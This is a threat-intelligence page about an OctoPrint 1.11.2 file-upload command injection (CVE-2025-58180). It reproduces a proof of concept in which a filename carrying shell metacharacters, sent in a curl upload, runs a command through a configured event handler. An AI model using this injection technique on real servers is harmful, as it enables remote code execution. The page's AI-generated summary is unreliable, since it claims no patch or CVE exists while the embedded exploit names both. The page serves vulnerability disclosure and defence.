OctoPrint 1.11.2 - File Upload
OctoPrint 1.11.2 - File Upload
AI Analysis
Technical Summary
The reported security threat concerns an exploit targeting OctoPrint version 1.11.2, specifically its file upload functionality. OctoPrint is an open-source web interface that enables remote management and control of 3D printers. The exploit likely leverages insufficient input validation or improper handling of uploaded files, which can allow attackers to upload malicious files to the server hosting OctoPrint. Such unauthorized file uploads could enable attackers to execute arbitrary code, modify or sabotage 3D print jobs, or gain further access to the underlying system. Although the exact vulnerability details and affected versions are not fully enumerated, the presence of exploit code (noted as text) suggests that proof-of-concept or working exploit scripts exist. No official patches or CVEs have been linked to this exploit yet, and no active exploitation has been reported in the wild. The exploit is classified as medium severity, reflecting moderate risk due to the potential for unauthorized access and disruption of 3D printing operations. Given OctoPrint's role in managing physical devices, exploitation could have tangible physical consequences beyond typical IT system compromises.
Potential Impact
Organizations using OctoPrint 1.11.2, especially those relying on 3D printing for prototyping, manufacturing, or critical operations, face risks including unauthorized control of printing jobs, potential sabotage or destruction of printed objects, and possible compromise of the host system. Attackers exploiting this vulnerability could disrupt production workflows, cause financial losses, or damage intellectual property. Additionally, if the host system is part of a larger network, lateral movement or further compromise could occur. The impact extends beyond data loss to physical asset manipulation, which is significant in industrial, medical, or research environments where 3D printing is integral. Although no widespread exploitation is reported, the availability of exploit code increases the risk of targeted attacks or opportunistic exploitation by less skilled attackers.
Mitigation Recommendations
To mitigate this threat, organizations should first verify if they are running OctoPrint version 1.11.2 and consider upgrading to a later, patched version once available. In the absence of official patches, administrators should restrict access to the OctoPrint interface using strong authentication mechanisms and network segmentation to limit exposure. Implement strict file upload validation and filtering at the web server or application level to prevent unauthorized file types or sizes. Employ monitoring and logging to detect unusual upload activity or unauthorized access attempts. Additionally, running OctoPrint in a containerized or sandboxed environment can reduce the risk of system-wide compromise. Regularly back up 3D printing configurations and files to enable recovery in case of sabotage. Finally, stay informed about updates from OctoPrint developers and security advisories to apply patches promptly.
Affected Countries
United States, Germany, China, Japan, South Korea, United Kingdom, France, Canada, Australia, Netherlands
Indicators of Compromise
- exploit-code: # Exploit Title: OctoPrint 1.11.2 - File Upload # Date: 2025-09-28 # Exploit Author: prabhatverma.addada # Vendor Homepage: https://octoprint.org # Software Link: https://github.com/OctoPrint/OctoPrint # Affected Version(s): <= 1.11.2 # Patched Version(s): 1.11.3 # CVE: CVE-2025-58180 # CVSS (per advisory): 7.5 # Platform: Linux / OctoPrint server # Type: Remote Code Execution (requires authenticated upload / API key or session) # # Short description: # An authenticated attacker with file-upload access can craft a filename containing shell metacharacters (e.g. ';', ${IFS}) which bypasses filename # sanitization and, when interpolated into a configured system event handler command, results in arbitrary command execution on the host. # # Scope & privileges: # - Trigger privileges: Authenticated file-upload (API key or valid session). NO admin/root required to trigger the attack. # - Precondition: A system event handler that executes shell commands using filename/path placeholders must be configured by an administrator. # # Tested on: # - OctoPrint 1.11.2 running via `octoprint serve --port 5000` on Ubuntu 22.04 # # Reproduction / PoC (manual): # # 1) Start OctoPrint 1.11.2: # octoprint serve --port 5000 --debug # Complete initial setup at http://127.0.0.1:5000 and create an admin user. # # 2) Configure a system event handler that runs shell commands with filename placeholders: # Edit ~/.octoprint/config.yaml and add: # # events: # enabled: true # subscriptions: # - event: FileAdded # type: system # debug: true # command: "{path}" # # Restart OctoPrint. # # 3) Create a harmless test gcode: # mkdir -p /tmp/gcode # cat > /tmp/gcode/ok.gcode <<'EOF' # ; minimal gcode # G28 # M105 # EOF # # 4) Obtain API key from Settings -> API and export it: # export API_KEY='<your_api_key_here>' # # 5) Ensure target proof file does not exist: # ls -la /tmp/test123 # # 6) PoC upload (non-destructive proof): # INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode' # # curl -sS -X POST -H "X-Api-Key: $API_KEY" \ # -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \ # "http://127.0.0.1:5000/api/files/local" # # 7) Verify execution: # ls -la /tmp/test123 # If /tmp/test123 exists, the injected command executed and RCE is demonstrated. # # Explanation: # - OctoPrint accepted the uploaded filename (sanitize_name allowed these characters in default config). # - FileAdded event payload contains the filename/path. # - A system event subscriber executed a shell command with that placeholder via subprocess with shell=True and without placeholder escaping. # - Shell metacharacters in the filename are interpreted by the shell and executed. # # Mitigations / Workarounds: # - Upgrade OctoPrint to 1.11.3 (patched). # - Disable event handlers using filename placeholders (set enabled: false or uncheck in GUI Event Manager). # - Set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads. # - Do not expose OctoPrint to hostile networks; restrict upload access. # # References: # - GitHub Security Advisory: https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc # - PoC repo: https://github.com/prabhatverma47/CVE-2025-58180 # # Notes for triage: # - Exploit requires only authenticated upload privileges to trigger. No admin/root required to perform the attack. # - PoC uses non-destructive `touch /tmp/test123`.
OctoPrint 1.11.2 - File Upload
Description
OctoPrint 1.11.2 - File Upload
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The reported security threat concerns an exploit targeting OctoPrint version 1.11.2, specifically its file upload functionality. OctoPrint is an open-source web interface that enables remote management and control of 3D printers. The exploit likely leverages insufficient input validation or improper handling of uploaded files, which can allow attackers to upload malicious files to the server hosting OctoPrint. Such unauthorized file uploads could enable attackers to execute arbitrary code, modify or sabotage 3D print jobs, or gain further access to the underlying system. Although the exact vulnerability details and affected versions are not fully enumerated, the presence of exploit code (noted as text) suggests that proof-of-concept or working exploit scripts exist. No official patches or CVEs have been linked to this exploit yet, and no active exploitation has been reported in the wild. The exploit is classified as medium severity, reflecting moderate risk due to the potential for unauthorized access and disruption of 3D printing operations. Given OctoPrint's role in managing physical devices, exploitation could have tangible physical consequences beyond typical IT system compromises.
Potential Impact
Organizations using OctoPrint 1.11.2, especially those relying on 3D printing for prototyping, manufacturing, or critical operations, face risks including unauthorized control of printing jobs, potential sabotage or destruction of printed objects, and possible compromise of the host system. Attackers exploiting this vulnerability could disrupt production workflows, cause financial losses, or damage intellectual property. Additionally, if the host system is part of a larger network, lateral movement or further compromise could occur. The impact extends beyond data loss to physical asset manipulation, which is significant in industrial, medical, or research environments where 3D printing is integral. Although no widespread exploitation is reported, the availability of exploit code increases the risk of targeted attacks or opportunistic exploitation by less skilled attackers.
Mitigation Recommendations
To mitigate this threat, organizations should first verify if they are running OctoPrint version 1.11.2 and consider upgrading to a later, patched version once available. In the absence of official patches, administrators should restrict access to the OctoPrint interface using strong authentication mechanisms and network segmentation to limit exposure. Implement strict file upload validation and filtering at the web server or application level to prevent unauthorized file types or sizes. Employ monitoring and logging to detect unusual upload activity or unauthorized access attempts. Additionally, running OctoPrint in a containerized or sandboxed environment can reduce the risk of system-wide compromise. Regularly back up 3D printing configurations and files to enable recovery in case of sabotage. Finally, stay informed about updates from OctoPrint developers and security advisories to apply patches promptly.
Technical Details
- Edb Id
- 52476
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for OctoPrint 1.11.2 - File Upload
# Exploit Title: OctoPrint 1.11.2 - File Upload # Date: 2025-09-28 # Exploit Author: prabhatverma.addada # Vendor Homepage: https://octoprint.org # Software Link: https://github.com/OctoPrint/OctoPrint # Affected Version(s): <= 1.11.2 # Patched Version(s): 1.11.3 # CVE: CVE-2025-58180 # CVSS (per advisory): 7.5 # Platform: Linux / OctoPrint server # Type: Remote Code Execution (requires authenticated upload / API key or session) # # Short description: # An authenticated attacker with file-uploa... (2990 more characters)
Threat ID: 69845ddcf9fa50a62f0fd49c
Added to database: 2/5/2026, 9:07:40 AM
Last enriched: 2/28/2026, 3:03:29 PM
Last updated: 3/22/2026, 8:19:24 AM
Views: 70
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.